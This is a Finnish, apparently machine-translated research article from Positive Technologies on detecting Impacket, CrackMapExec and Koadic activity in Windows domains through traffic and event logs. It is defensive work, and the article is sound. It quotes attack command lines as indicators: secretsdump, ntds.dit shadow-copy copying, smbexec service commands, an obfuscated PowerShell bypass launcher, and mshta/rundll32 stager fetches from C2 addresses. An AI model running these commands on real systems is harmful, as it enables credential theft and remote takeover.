Kuinka havaita hyökkäykset Windows-infrastruktuuriin: hakkerityökalujen tutkiminen

Hyökkäysten määrä yrityssektorilla kasvaa joka vuosi: esim Vuonna 2017 yksittäisiä tapauksia kirjattiin 13 % enemmän kuin vuonna 2016 ja vuoden 2018 lopussa - 27 % enemmän tapauksiakuin edellisellä kaudella. Mukaan lukien ne, joissa pääasiallinen työväline on Windows-käyttöjärjestelmä. Vuosina 2017–2018 APT Dragonfly, APT28, APT MuddyWater teki hyökkäyksiä hallituksia ja sotilasjärjestöjä vastaan ​​Euroopassa, Pohjois-Amerikassa ja Saudi-Arabiassa. Ja käytimme kolmea työkalua tähän - Impact, CrackMapExec и Koadic. Heidän lähdekoodinsa on avoin ja saatavilla GitHubissa.

On syytä huomata, että näitä työkaluja ei käytetä ensimmäiseen tunkeutumiseen, vaan hyökkäyksen kehittämiseen infrastruktuurin sisällä. Hyökkääjät käyttävät niitä hyökkäyksen eri vaiheissa kehälle tunkeutumisen jälkeen. Tämä on muuten vaikea havaita ja usein vain tekniikan avulla tunnistaa verkkoliikenteen kompromisseja tai työkaluja, jotka mahdollistavat havaita hyökkääjän aktiiviset toimet sen jälkeen, kun hän on tunkeutunut infrastruktuuriin. Työkaluissa on useita toimintoja tiedostojen siirtämisestä vuorovaikutukseen rekisterin kanssa ja komentojen suorittamiseen etäkoneella. Teimme tutkimuksen näistä työkaluista määrittääksemme niiden verkkotoiminnan.

Mitä meidän piti tehdä:

• Ymmärrä, kuinka hakkerointityökalut toimivat. Ota selvää, mitä hyökkääjien on hyödynnettävä ja mitä tekniikoita he voivat käyttää.
• Selvitä, mitä tietoturvatyökalut eivät havaitse hyökkäyksen ensimmäisissä vaiheissa. Tiedusteluvaihe voidaan ohittaa joko siksi, että hyökkääjä on sisäinen hyökkääjä tai koska hyökkääjä hyödyntää infrastruktuurissa olevaa aukkoa, jota ei aiemmin tunnettu. On mahdollista palauttaa hänen toimiensa koko ketju, mistä johtuu halu havaita lisäliike.
• Poista väärät positiiviset tulokset tunkeutumisen havaitsemistyökaluista. Emme saa unohtaa, että kun tietyt toiminnot havaitaan pelkästään tiedustelun perusteella, usein virheet ovat mahdollisia. Yleensä infrastruktuurissa on riittävä määrä tapoja, joita ei voi ensi silmäyksellä erottaa laillisista tiedoista.

Mitä nämä työkalut antavat hyökkääjille? Jos tämä on Impacket, hyökkääjät saavat suuren kirjaston moduuleja, joita voidaan käyttää hyökkäyksen eri vaiheissa, jotka seuraavat kehyksen rikkomisen jälkeen. Monet työkalut käyttävät Impacket-moduuleja sisäisesti - esimerkiksi Metasploit. Siinä on dcomexec ja wmiexec komentojen etäsuorittamiseen sekä secretsdump tilien hakemiseen muistista, jotka lisätään Impacketista. Tämän seurauksena tällaisen kirjaston aktiivisuuden oikea havaitseminen varmistaa johdannaisten havaitsemisen.

Ei ole sattumaa, että tekijät kirjoittivat "Powered by Impacket" CrackMapExecistä (tai yksinkertaisesti CME:stä). Lisäksi CME:ssä on valmiita toimintoja suosittuihin skenaarioihin: Mimikatz salasanojen tai niiden tiivisteiden hankkimiseen, Meterpreter- tai Empire-agentin toteutus etäsuoritukseen sekä Bloodhound aluksella.

Kolmas valitsemamme työkalu oli Koadic. Se on melko uusi, se esiteltiin kansainvälisessä hakkerikonferenssissa DEFCON 25 vuonna 2017, ja se erottuu epätyypillisestä lähestymistavasta: se toimii HTTP:n, Java Scriptin ja Microsoft Visual Basic Scriptin (VBS) kautta. Tätä lähestymistapaa kutsutaan elämiseksi maasta: työkalu käyttää joukkoa riippuvuuksia ja kirjastoja, jotka on rakennettu Windowsiin. Tekijät kutsuvat sitä COM Command & Controliksi tai C3:ksi.

IMPACKET

Impaketin toiminnallisuus on erittäin laaja ulottuen AD:n sisäisistä tiedusteluista ja tietojen keräämisestä sisäisiltä MS SQL -palvelimille valtuustietojen hankintatekniikoihin: tämä on SMB-välityshyökkäys ja käyttäjien salasanojen tiivisteitä sisältävän ntds.dit-tiedoston hankkiminen toimialueen ohjaimesta. Impacket myös suorittaa komentoja etänä neljällä eri menetelmällä: WMI, Windows Scheduler Management Service, DCOM ja SMB, ja vaatii valtuustiedot tehdäkseen niin.

Secrets dump

Katsotaanpa Secretsdump. Tämä on moduuli, joka voi kohdistaa sekä käyttäjän koneisiin että toimialueen ohjaimiin. Sen avulla voidaan hankkia kopioita muistialueista LSA, SAM, SECURITY, NTDS.dit, joten se voidaan nähdä hyökkäyksen eri vaiheissa. Moduulin toiminnan ensimmäinen vaihe on SMB-autentikointi, joka vaatii joko käyttäjän salasanan tai sen hashin automaattisen Pass the Hash -hyökkäyksen suorittamiseksi. Seuraavaksi tulee pyyntö avata pääsy Service Control Manageriin (SCM) ja saada pääsy rekisteriin winreg-protokollan kautta, jonka avulla hyökkääjä voi saada selville kiinnostuksen kohteiden tiedot ja saada tuloksia SMB:n kautta.

Kuvassa 1 näemme, kuinka tarkalleen winreg-protokollaa käytettäessä pääsy saadaan käyttämällä rekisteriavainta LSA:lla. Voit tehdä tämän käyttämällä DCERPC-komentoa, jonka koodi on 15 - OpenKey.

Riisi. 1. Rekisteriavaimen avaaminen winreg-protokollalla

Seuraavaksi, kun avaimeen pääsee käsiksi, arvot tallennetaan SaveKey-komennolla opkoodilla 20. Impacket tekee tämän hyvin erityisellä tavalla. Se tallentaa arvot tiedostoon, jonka nimi on 8 satunnaisen merkin merkkijono, johon on liitetty .tmp. Lisäksi tämä tiedosto ladataan edelleen SMB:n kautta System32-hakemistosta (kuva 2).

Riisi. 2. Järjestelmä rekisteriavaimen hankkimiseksi etäkoneelta

Osoittautuu, että tällainen toiminta verkossa voidaan havaita kyselyillä tiettyihin rekisterihaaroihin winreg-protokollaa käyttäen, tiettyjä nimiä, komentoja ja niiden järjestystä.

Tämä moduuli jättää jälkiä myös Windowsin tapahtumalokiin, mikä helpottaa sen havaitsemista. Esimerkiksi komennon suorittamisen seurauksena

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016:n lokissa näemme seuraavan avaintapahtumasarjan:

1. 4624 - etäkirjautuminen.
2. 5145 - winreg-etäpalvelun käyttöoikeuksien tarkistus.
3. 5145 - tiedostojen käyttöoikeuksien tarkistus System32-hakemistossa. Tiedostolla on yllä mainittu satunnainen nimi.
4. 4688 - vssadminin käynnistävän cmd.exe-prosessin luominen:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - prosessin luominen komennolla:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - prosessin luominen komennolla:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - prosessin luominen komennolla:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Kuten monissa jälkikäyttötyökaluissa, Impacketissa on moduuleja komentojen etäsuorittamiseen. Keskitymme smbexeciin, joka tarjoaa interaktiivisen komentotulkin etäkoneelle. Tämä moduuli vaatii myös todennuksen SMB:n kautta joko salasanalla tai salasanahajautuskoodilla. Kuvassa Kuvassa 3 näemme esimerkin tällaisen työkalun toiminnasta, tässä tapauksessa se on paikallinen järjestelmänvalvojan konsoli.

Riisi. 3. Interaktiivinen smbexec-konsoli

Smbexecin ensimmäinen vaihe todennuksen jälkeen on SCM:n avaaminen OpenSCManagerW-komennolla (15). Kysely on huomionarvoinen: MachineName-kenttä on DUMMY.

Riisi. 4. Pyydä Service Control Managerin avaamista

Seuraavaksi palvelu luodaan CreateServiceW-komennolla (12). Smbexecin tapauksessa voimme nähdä saman komennon rakennuslogiikan joka kerta. Kuvassa 5 vihreä tarkoittaa muuttumattomia komentoparametreja, keltainen osoittaa, mitä hyökkääjä voi muuttaa. On helppo nähdä, että suoritettavan tiedoston nimeä, sen hakemistoa ja tulostiedostoa voidaan muuttaa, mutta loput on paljon vaikeampi muuttaa häiritsemättä Impacket-moduulin logiikkaa.

Riisi. 5. Pyydä palvelun luomista Service Control Managerin avulla

Smbexec jättää myös selviä jälkiä Windowsin tapahtumalokiin. Windows Server 2016:n lokissa interaktiiviselle komentotulkkille, jossa on ipconfig-komento, näemme seuraavan tapahtumasarjan:

1. 4697 – palvelun asennus uhrin koneelle:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - cmd.exe-prosessin luominen pisteen 1 argumenteilla.
3. 5145 - C$-hakemiston __output-tiedoston käyttöoikeuksien tarkistus.
4. 4697 — palvelun asennus uhrin koneelle.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - cmd.exe-prosessin luominen pisteen 4 argumenteilla.
6. 5145 - C$-hakemiston __output-tiedoston käyttöoikeuksien tarkistus.

Impacet on hyökkäystyökalujen kehittämisen perusta. Se tukee lähes kaikkia Windows-infrastruktuurin protokollia ja samalla sillä on omat ominaispiirteensä. Tässä ovat erityiset winreg-pyynnöt ja SCM API:n käyttö tyypillisellä komentomuodolla, tiedostonimimuoto ja SMB-jako SYSTEM32.

CRACKMAPEXEC

CME-työkalu on suunniteltu ensisijaisesti automatisoimaan ne rutiinitoiminnot, jotka hyökkääjän on suoritettava päästäkseen eteenpäin verkossa. Sen avulla voit työskennellä yhdessä tunnetun Empire-agentin ja Meterpreterin kanssa. Suorittaakseen komentoja salaisesti CME voi hämärtää ne. Bloodhoundin (erillinen tiedustelutyökalu) avulla hyökkääjä voi automatisoida aktiivisen verkkotunnuksen järjestelmänvalvojan istunnon haun.

Verikoira

Bloodhound itsenäisenä työkaluna mahdollistaa edistyneen tiedustelun verkossa. Se kerää tietoja käyttäjistä, koneista, ryhmistä, istunnoista ja toimitetaan PowerShell-komentosarjana tai binaaritiedostona. Tietojen keräämiseen käytetään LDAP- tai SMB-pohjaisia ​​protokollia. CME-integraatiomoduulin avulla voit ladata Bloodhoundin uhrin koneelle, suorittaa sen ja vastaanottaa kerätyt tiedot suorituksen jälkeen, mikä automatisoi järjestelmän toimintoja ja tekee niistä vähemmän havaittavissa. Bloodhoundin graafinen kuori esittää kerätyt tiedot kaavioiden muodossa, jonka avulla voit löytää lyhimmän polun hyökkääjän koneelta verkkotunnuksen järjestelmänvalvojalle.

Riisi. 6. Bloodhound-käyttöliittymä

Moduuli toimii uhrin koneella luomalla tehtävän käyttämällä ATSVC:tä ja SMB:tä. ATSVC on käyttöliittymä Windows Task Schedulerin kanssa työskentelemiseen. CME käyttää NetrJobAdd(1) -toimintoaan tehtävien luomiseen verkon yli. Esimerkki siitä, mitä CME-moduuli lähettää, on esitetty kuvassa. 7: Tämä on cmd.exe-komentokutsu ja XML-muodossa olevien argumenttien muodossa oleva hämäräkoodi.

Kuva 7. Tehtävän luominen CME:n kautta

Kun tehtävä on jätetty suoritettavaksi, uhrin kone käynnistää Bloodhoundin itse, ja tämä näkyy liikenteessä. Moduulille on ominaista LDAP-kyselyt, joilla saadaan vakioryhmiä, luettelo kaikista toimialueen koneista ja käyttäjistä sekä tietoa aktiivisista käyttäjäistunnoista SRVSVC NetSessEnum -pyynnön kautta.

Riisi. 8. Aktiivisten istuntojen luettelon saaminen SMB:n kautta

Lisäksi Bloodhoundin käynnistämiseen uhrin koneella auditoinnin ollessa käytössä seuraa tapahtuma, jonka tunnus on 4688 (prosessin luominen) ja prosessin nimi. «C:WindowsSystem32cmd.exe». Huomionarvoista siinä ovat komentorivin argumentit:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Moduuli enum_avproducts on erittäin mielenkiintoinen toiminnallisuuden ja toteutuksen kannalta. WMI:n avulla voit käyttää WQL-kyselykieltä tietojen hakemiseen eri Windows-objekteista, mitä tämä CME-moduuli käytännössä käyttää. Se luo kyselyitä AntiSpywareProduct- ja AntiМirusProduct-luokille uhrin koneeseen asennetuista suojaustyökaluista. Saadakseen tarvittavat tiedot moduuli muodostaa yhteyden rootSecurityCenter2-nimiavaruuteen, luo WQL-kyselyn ja vastaanottaa vastauksen. Kuvassa Kuvassa 9 on esitetty tällaisten pyyntöjen ja vastausten sisältö. Esimerkissämme löytyi Windows Defender.

Riisi. 9. Enum_avproducts -moduulin verkkotoiminta

Usein WMI-auditointi (Trace WMI-Activity), jonka tapahtumista löydät hyödyllistä tietoa WQL-kyselyistä, saattaa olla poissa käytöstä. Mutta jos se on käytössä, jos enum_avproducts-skripti suoritetaan, tallennetaan tapahtuma, jonka tunnus on 11. Se sisältää pyynnön lähettäneen käyttäjän nimen ja rootSecurityCenter2-nimiavaruuden nimen.

Jokaisella CME-moduuleilla oli omat artefaktinsa, olipa kyse sitten erityisistä WQL-kyselyistä tai tietyntyyppisten tehtävien luomisesta tehtävän ajastimessa, jossa oli hämärtäminen ja Bloodhound-spesifinen toiminta LDAP:ssa ja SMB:ssä.

KOADIC

Koadicin erottuva piirre on Windowsiin sisäänrakennettujen JavaScript- ja VBScript-tulkkien käyttö. Tässä mielessä se seuraa maasta elämistä - eli sillä ei ole ulkoisia riippuvuuksia ja se käyttää tavallisia Windows-työkaluja. Tämä on työkalu täydelliseen komentoon ja ohjaukseen (CnC), koska tartunnan jälkeen koneeseen asennetaan "implantti", jonka avulla sitä voidaan hallita. Tällaista konetta kutsutaan Koadic-terminologiassa "zombiksi". Jos uhrin puolella ei ole riittävästi oikeuksia täysimääräiseen toimintaan, Koadicilla on mahdollisuus nostaa ne käyttämällä User Account Control bypass (UAC bypass) -tekniikoita.

Riisi. 10. Koadic Shell

Uhrin on aloitettava viestintä Command & Control -palvelimen kanssa. Tätä varten hänen on otettava yhteyttä aiemmin valmisteltuun URI-osoitteeseen ja vastaanotettava Koadic-päärunko jollakin lavastimella. Kuvassa Kuvassa 11 on esimerkki mshta stageristä.

Riisi. 11. Istunnon alustaminen CnC-palvelimen kanssa

Vastausmuuttujan WS perusteella käy selväksi, että suoritus tapahtuu WScript.Shellin kautta ja muuttujat STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE sisältävät avaintietoja nykyisen istunnon parametreista. Tämä on ensimmäinen pyyntö-vastaus-pari HTTP-yhteydessä CnC-palvelimen kanssa. Myöhemmät pyynnöt liittyvät suoraan kutsuttujen moduulien (implanttien) toimivuuteen. Kaikki Koadic-moduulit toimivat vain aktiivisen istunnon kanssa CnC:n kanssa.

Mimikatz

Aivan kuten CME toimii Bloodhoundin kanssa, Koadic toimii Mimikatzin kanssa erillisenä ohjelmana ja sillä on useita tapoja käynnistää se. Alla on pyyntö-vastaus-pari Mimikatz-implanttien lataamista varten.

Riisi. 12. Siirrä Mimikatz Koadicille

Voit nähdä, kuinka pyynnön URI-muoto on muuttunut. Se sisältää nyt arvon csrf-muuttujalle, joka vastaa valitusta moduulista. Älä kiinnitä huomiota hänen nimeensä; Tiedämme kaikki, että CSRF ymmärretään yleensä eri tavalla. Vastaus oli sama Koadicin päärunko, johon lisättiin Mimikatziin liittyvä koodi. Se on melko suuri, joten katsotaanpa keskeisiä kohtia. Tässä on Mimikatz-kirjasto base64-koodattuina, sarjoitettu .NET-luokka, joka lisää sen, ja argumentit Mimikatzin käynnistämiseksi. Suoritustulos välitetään verkon yli selkeänä tekstinä.

Riisi. 13. Tulos Mimikatzin suorittamisesta etäkoneella

Exec_cmd

Koadicissa on myös moduuleja, jotka voivat suorittaa komentoja etänä. Täällä näemme saman URI-luontimenetelmän ja tutut sid- ja csrf-muuttujat. Exec_cmd-moduulin tapauksessa runkoon lisätään koodi, joka pystyy suorittamaan komentotulkkikomentoja. Alla on esitetty CnC-palvelimen HTTP-vastauksen sisältämä koodi.

Riisi. 14. Implanttikoodi exec_cmd

GAWTUUGCFI-muuttuja tutulla WS-attribuutilla tarvitaan koodin suorittamiseen. Sen avulla implantti kutsuu kuorta, prosessoimalla kahta koodihaaraa - shell.exec, joka palauttaa lähtötietovirran, ja shell.run ilman paluuta.

Koadic ei ole tyypillinen työkalu, mutta sillä on omat artefaktinsa, joiden avulla se voidaan löytää laillisesta liikenteestä:

• HTTP-pyyntöjen erityinen muodostus,
• käyttämällä winHttpRequests APIa,
• WScript.Shell-objektin luominen ActiveXObjectin kautta,
• suuri suoritettava runko.

Ensimmäisen yhteyden käynnistää asteikko, joten sen toiminta on mahdollista havaita Windows-tapahtumien kautta. Mshta:lle tämä on tapahtuma 4688, joka osoittaa prosessin luomisen start-attribuutilla:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Kun Koadic on käynnissä, voit nähdä muita 4688 tapahtumaa ominaisuuksia, jotka kuvaavat sitä täydellisesti:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Tulokset

Maasta eläminen on saamassa suosiota rikollisten keskuudessa. He käyttävät Windowsin sisäänrakennettuja työkaluja ja mekanismeja tarpeisiinsa. APT-raporteissa näkyy yhä useammin tätä periaatetta noudattavia suosittuja työkaluja Koadic, CrackMapExec ja Impacket. Myös GitHubin haarukoiden määrä näille työkaluille on kasvussa, ja uusia ilmaantuu (niitä on jo noin tuhat). Trendi on kasvattamassa suosiota yksinkertaisuutensa ansiosta: hyökkääjät eivät tarvitse kolmannen osapuolen työkaluja, he ovat jo uhrien koneilla ja auttavat heitä ohittamaan turvatoimenpiteet. Keskitymme verkkoviestinnän tutkimiseen: jokainen yllä kuvattu työkalu jättää omat jälkinsä verkkoliikenteeseen; Niiden yksityiskohtaisen tutkimuksen ansiosta pystyimme opettamaan tuotteemme PT-verkkohyökkäysten etsintä havaita ne, mikä lopulta auttaa tutkimaan koko heihin liittyvää kybertapahtumien ketjua.

Tekijät:

• Anton Tyurin, asiantuntijapalveluosaston päällikkö, PT Expert Security Center, Positive Technologies
• Egor Podmokov, asiantuntija, PT Expert Security Center, Positive Technologies

Lähde: will.com